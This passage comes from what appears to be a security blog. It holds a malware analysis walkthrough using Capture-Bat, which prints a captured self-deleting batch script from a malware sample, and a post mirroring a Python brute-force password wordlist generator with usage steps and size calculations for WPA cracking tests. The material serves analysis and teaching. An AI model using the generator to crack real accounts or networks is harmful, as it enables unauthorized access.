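            findings.append(("run-key-persistence", tgt, None))
    return findings


if __name__ == "__main__":
    for rule, target, detail in triage(parse_capture_log(SAMPLE_LOG)):
        note = "  (looks like %s)" % detail if detail else ""
        print("%-24s %s%s" % (rule, target, note))
```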

You may be wondering about the funny name for this particular piece of malware, 40033d8063564d1b3e4b41f1d5c9a31f.exe. The experienced will recognize the name as an MD5 hash; MD5 hashing is commonly used to uniquely identify malware, or any exe for that matter. I will also Google search the MD5 hash of the malware to see if anyone else has run across it. Turns out others have, and Anubis has a good analysis of this malware as well. Anubis reports some of the same activities as we see in our output. You can also perform a hash search over at VirusTotal; it looks like other anti-virus vendors have signatures for this malware. For the uninformed, VirusTotal will query about 40 anti-virus vendors to see which ones have seen it before. I love malware analysis sites like Anubis and VirusTotal, but nothing beats performing analysis on a local system. For example, we were able to capture the deleted batch script that the malware executed; below are the contents of that batch script.

@echo off
:deleteagain
del /A:H /F 40033d8063564d1b3e4b41f1d5c9a31f.exe
del /F 40033d8063564d1b3e4b41f1d5c9a31f.exe
if exist 40033d8063564d1b3e4b41f1d5c9a31f.exe goto deleteagain
del zcbgjy.bat

Granted the batch script is lame; it’s a very basic script that deletes the malware and then deletes itself, but the batch script could have contained a lot of useful information. All deleted or modified files that Capture-Bat sees are located in the following directory.

C:\Program Files\Capture\logs

Below is a screen shot of my deleted files for this malware.

Don’t forget that Capture-Bat collects pcap’s during the analysis under the same directory as the deleted malware, see screen shot below.

From a quick Google search it doesn’t look like memehehz.info has a great reputation. It could be that memehehz.info is a malware site, or it could be that memehehz.info got infected with malware itself. The malware analyzed here isn’t the most recent malware; I simply wanted to walk you through an example of how Capture-Bat can help you analyze what the malware is trying to do. When it comes to analyzing malware I wouldn’t say only the tip of the iceberg has been analyzed, but there is definitely more to cover. My main goal was to get others familiar with good malware analysis tools such as Capture-Bat so that they may be better able to react and respond to malicious activity on their own networks. Hopefully this helped, and as always if you have any feedback I’d love to hear it.

Password dictionary generator

Saturday, March 6th, 2010

I had the need to generate a password dictionary that would cover every possible combination for a defined character set.  I first learned to program in Python so I was going to start there first.  Before writing the program I decided to Google and see if anyone else had tackled this problem via Python, turned out they had.  Siph0n posted his Python code to create a password dictionary over at the BackTrack forums.  I wanted to post it here as a mirror and to discuss the implications of creating a password dictionary with every possible combination.  Below is the Python code.

f = open('wordlist', 'w')

# Yield every ordered selection (with repetition) of n items, first
# position varying slowest, exactly like nested for-loops would.
def xselections(items, n):
    if n == 0:
        yield []
    else:
        for i in xrange(len(items)):
            for ss in xselections(items, n-1):
                yield [items[i]] + ss

# ASCII code ranges for the three character classes:
# Numbers = 48 - 57
# Capital = 65 - 90
# Lower = 97 - 122
numb = range(48, 58)
cap = range(65, 91)
low = range(97, 123)

# Keep asking until a valid menu choice (1-7) is entered.
choice = 0
while int(choice) not in range(1, 8):
    choice = raw_input('''
    1) Numbers
    2) Capital Letters
    3) Lowercase Letters
    4) Numbers + Capital Letters
    5) Numbers + Lowercase Letters
    6) Numbers + Capital Letters + Lowercase Letters
    7) Capital Letters + Lowercase Letters
    : ''')

choice = int(choice)
poss = []
if choice == 1:
    poss += numb
elif choice == 2:
    poss += cap
elif choice == 3:
    poss += low
elif choice == 4:
    poss += numb
    poss += cap
elif choice == 5:
    poss += numb
    poss += low
elif choice == 6:
    poss += numb
    poss += cap
    poss += low
elif choice == 7:
    poss += cap
    poss += low

# Turn the ASCII codes into one-character strings.
bigList = []
for i in poss:
    bigList.append(str(chr(i)))

MIN = int(raw_input("What is the min size of the word? "))
MAX = int(raw_input("What is the max size of the word? "))
# One word per line for every length from MIN to MAX inclusive.
for i in range(MIN, MAX + 1):
    for s in xselections(bigList, i):
        f.write(''.join(s) + '\n')
f.close()

If you’re familiar with programming and Python in particular then you could just grab the code and roll but I really wanted to discuss the usefulness of an application like this.  First I will discuss the basics of how to get this program up and running but will eventually jump into other implications such as time, storage, and usefulness of a password dictionary.

How to install and use the program

  1. You must have Python installed.  If you’re running Linux (you should be) then it’s probably already installed.  If you’re running Windows then you will have to download Python.
  2. Now that you have Python installed, simply copy and paste the code above into a text file and name it passwordDictionaryGenerator.py.  The .py extension is needed because that’s how Python recognizes code that it’s supposed to execute.
  3. Modify the appropriate variables within the program.  The only variables you may want to modify are numb, cap, and low.  These variables contain the ASCII code ranges for the letters and numbers you will be using to generate your dictionary.  You may want to modify these variables so that your dictionary does not contain a-z but only a-k; I’ll leave that up to you.
  4. Now to run the program simply type
    python passwordDictionaryGenerator.py

    You will have to answer the questions about which character set you want to use and how long / short the words in your password dictionary are going to be.  Once you answer the questions it may seem like the program isn’t doing anything, but it is; it will drop you back to the command line once the program has completed.  The output will be a file called wordlist.

So now you have this cool program that can generate a password dictionary for you, but how big (MB, GB, TB, etc.) will this dictionary be?  How long will it take to generate this dictionary?  Let’s tackle the size question first, as it will help us calculate the time as well.  The key to calculating the size is a math term called permutations (here, permutations with repetition).  It is a simple formula that determines the number of words for a particular character set and word length.  The basic equation is below.

n^r

n = total character set (e.g.  a-z + A-Z + 0-9 = 62)

r = length of the word

Now you’ll have to calculate n^r for each length and add them up to get every possible combination.  So for a password up to 6 characters long your equation will look like the following.

n^6 + n^5 + n^4 + n^3 + n^2 + n^1 = every possible combination

Let’s try an example where our character set is a-z (n = 26) and our password is no longer than 6 (r = 1-6) digits, how many words will be in our dictionary?

26^6 + 26^5 + 26^4 + 26^3 + 26^2 + 26^1 = 321,272,406 = total # of words

So now we understand how to calculate the total number of words in our dictionary.  How does that relate to the size?  Well, for the most part, if the length of the password is x then the size in bytes will be x + 1 for that particular line (x characters plus the newline).  Then all we have to do is multiply each n^r by the size of a line of that length to get the size for that particular length, and add the lengths together.  That may have just sounded really confusing, so hopefully the following graph clears that up some.

I went ahead and generated this dictionary; it took about 30 minutes.  Turns out the size matched my calculations.

So now you have the basic formula for calculating the size of your desired dictionary.  Let’s take a look at a larger example just to cure our curiosity.  Let’s assume the following parameters.

  • character set = a-z, A-Z, & 0-9
  • password length = 1-8
  • n = 62
  • r = 1 – 8

With these parameters the size of our dictionary jumps to 1,800 terabytes or 1.8 petabytes. Take a look at the chart below.

You can see how quickly the size jumps up. I don’t know about you, but I don’t have a two petabyte drive lying around. Generating this dictionary is just infeasible. I did calculate the time it would probably take to generate this dictionary; it came out to be about 11 days. So the time to create such a dictionary is nothing compared to the storage required to house it. Not only that, I don’t know too many applications that can handle a dictionary this large as input, so that’s another factor you’ll have to keep in mind when generating your dictionary.

Calculating the time it takes to generate these dictionaries I’ll leave up to you.  The basic idea is that you can run the Python program for a particular password length for a set amount of time and then extrapolate from there.  For the most part time isn’t really a factor, but storage is. The concepts I’ve talked about here are nothing new. The idea of generating a password dictionary came to me and my coworkers as we were thinking of ways to test a WPA wireless infrastructure. Attacking WPA can be done offline, so we were thinking of generating a dictionary to accomplish this. Hours later we realized the difficulty of generating such a large dictionary. This was actually good news, because it meant that an attacker would have an extremely difficult time attacking a WPA access point with a complex password. Renderman and the Church of Wifi thought about this problem way before I did and came up with some rainbow tables to help test the strength of your WPA access point. You can’t really create a dictionary with every single combination for a lengthy password; your best bet is to create a dictionary with the most “common” passwords, which is no easy task either.
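Since the graph and chart referenced above did not survive, here is an added example (my own code, not Siph0n's script or part of the original post) that reproduces the size calculation from the permutations section and the timing extrapolation just described. It computes n^r words per length, (r + 1) bytes per line, and the totals for a character set of size n over a range of lengths; the function names (dictionary_table, total_bytes, estimate_seconds and so on) and the timing sample at the bottom are my own constructions.

```python
# Added example: sizing a full-combination password dictionary.
# Reproduces the post's arithmetic (n^r words per length, r + 1 bytes per line)
# and the "time a sample, then extrapolate" method. Function names are mine.

def words_for_length(n, r):
    """Distinct words of exactly r characters drawn from n symbols: n^r."""
    return n ** r


def dictionary_table(n, min_len, max_len):
    """Rows of (length, word_count, byte_count) for each length min_len..max_len."""
    rows = []
    for r in range(min_len, max_len + 1):
        count = words_for_length(n, r)
        rows.append((r, count, count * (r + 1)))  # r characters plus '\n'
    return rows


def total_words(n, min_len, max_len):
    """Sum of n^r over the length range, i.e. every possible combination."""
    return sum(count for _, count, _ in dictionary_table(n, min_len, max_len))


def total_bytes(n, min_len, max_len):
    """Size of the wordlist file on disk for the same parameters."""
    return sum(size for _, _, size in dictionary_table(n, min_len, max_len))


def human_size(num_bytes):
    """Render a byte count with binary units (the post's TB figures are binary)."""
    units = ["B", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB"]
    value = float(num_bytes)
    idx = 0
    while value >= 1024 and idx < len(units) - 1:
        value /= 1024
        idx += 1
    return f"{value:.2f} {units[idx]}"


def estimate_seconds(sample_words, sample_seconds, total):
    """Extrapolate generation time from a timed run, assuming a constant write rate."""
    if sample_words <= 0 or sample_seconds <= 0:
        raise ValueError("sample must be positive")
    return total * (sample_seconds / sample_words)


def charset_size(menu_choice):
    """Map the script's menu choices 1-7 to n, the size of the character set."""
    sizes = {1: 10, 2: 26, 3: 26, 4: 36, 5: 36, 6: 62, 7: 52}
    return sizes[menu_choice]


if __name__ == "__main__":
    # The post's first example: a-z (n = 26), lengths 1-6.
    for r, count, size in dictionary_table(charset_size(3), 1, 6):
        print(f"len {r}: {count:>15,} words  {human_size(size):>12}")
    print("total words:", f"{total_words(26, 1, 6):,}")
    print("total size :", human_size(total_bytes(26, 1, 6)))

    # The post's second example: a-z, A-Z, 0-9 (n = 62), lengths 1-8.
    print("62-symbol, lengths 1-8:", human_size(total_bytes(62, 1, 8)))

    # Constructed timing sample (not a real measurement): suppose the script
    # wrote 1,000,000 lines in 2.5 seconds. Extrapolate to the full 62^1..62^8 set.
    secs = estimate_seconds(1_000_000, 2.5, total_words(62, 1, 8))
    print(f"estimated generation time at that rate: {secs / 86400:.0f} days")
```

Running it prints the per-length breakdown that the missing graph showed, the 321,272,406-word total for a-z with lengths 1-6, and the roughly 1.8 PiB figure for the 62-character, 1-8 case. To use the timing part for real, replace the constructed sample with the line count and wall-clock seconds from a short run of the script on a single length.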

The moral of the story is to use lengthy complex passwords with a high character set, but you knew that already. So I just suggested that this program is somewhat useless, well it is but it isn’t. You can use this program to generate a small dictionary but a large dictionary (greater than a couple of terabytes) is probably out of the question. So use this program and let me know what your results are, I’m always interested in your feedback. Happy cracking.